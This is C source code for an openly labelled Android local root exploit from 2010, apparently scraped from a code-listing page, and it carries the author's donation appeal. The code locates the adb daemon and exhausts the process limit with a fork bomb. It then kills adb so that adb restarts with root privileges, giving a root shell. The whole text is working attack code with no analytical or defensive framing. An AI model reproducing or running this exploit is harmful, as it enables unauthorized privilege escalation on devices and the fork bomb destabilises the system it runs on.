1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154
|
#include <stdio.h> #include <sys/types.h> #include <sys/time.h> #include <sys/resource.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> #include <string.h> #include <signal.h> #include <stdlib.h>
void die(const char *msg) { perror(msg); exit(errno); }
pid_t find_adb() { char buf[256]; int i = 0, fd = 0; pid_t found = 0;
for (i = 0; i < 32000; ++i) { sprintf(buf, "/proc/%d/cmdline", i); if ((fd = open(buf, O_RDONLY)) < 0) continue; memset(buf, 0, sizeof(buf)); read(fd, buf, sizeof(buf) - 1); close(fd); if (strstr(buf, "/sbin/adb")) { found = i; break; } } return found; }
void restart_adb(pid_t pid) { kill(pid, 9); }
void wait_for_root_adb(pid_t old_adb) { pid_t p = 0;
for (;;) { p = find_adb(); if (p != 0 && p != old_adb) break; sleep(1); } sleep(5); kill(-1, 9); }
int main(int argc, char **argv) { pid_t adb_pid = 0, p; int pids = 0, new_pids = 1; int pepe[2]; char c = 0; struct rlimit rl;
printf("[*] CVE-2010-EASY Android local root exploit (C) 2010 by 743C\n\n"); printf("[*] checking NPROC limit ...\n");
if (getrlimit(RLIMIT_NPROC, &rl) < 0) die("[-] getrlimit");
if (rl.rlim_cur == RLIM_INFINITY) { printf("[-] No RLIMIT_NPROC set. Exploit would just crash machine. Exiting.\n"); exit(1); }
printf("[+] RLIMIT_NPROC={%lu, %lu}\n", rl.rlim_cur, rl.rlim_max); printf("[*] Searching for adb ...\n");
adb_pid = find_adb();
if (!adb_pid) die("[-] Cannot find adb");
printf("[+] Found adb as PID %d\n", adb_pid); printf("[*] Spawning children. Dont type anything and wait for reset!\n"); printf("[*]\n[*] If you like what we are doing you can send us PayPal money to\n" "[*] 7-4-3-C@web.de so we can compensate time, effort and HW costs.\n" "[*] If you are a company and feel like you profit from our work,\n" "[*] we also accept donations > 1000 USD!\n"); printf("[*]\n[*] adb connection will be reset. restart adb server on desktop and re-login.\n");
sleep(5);
if (fork() > 0) exit(0);
setsid(); pipe(pepe);
if (fork() == 0) { close(pepe[0]); for (;;) { if ((p = fork()) == 0) { exit(0); } else if (p < 0) { if (new_pids) { printf("\n[+] Forked %d childs.\n", pids); new_pids = 0; write(pepe[1], &c, 1); close(pepe[1]); } } else { ++pids; } } }
close(pepe[1]); read(pepe[0], &c, 1);
restart_adb(adb_pid);
if (fork() == 0) { fork(); for (;;) sleep(0x743C); }
wait_for_root_adb(adb_pid); return 0; }
|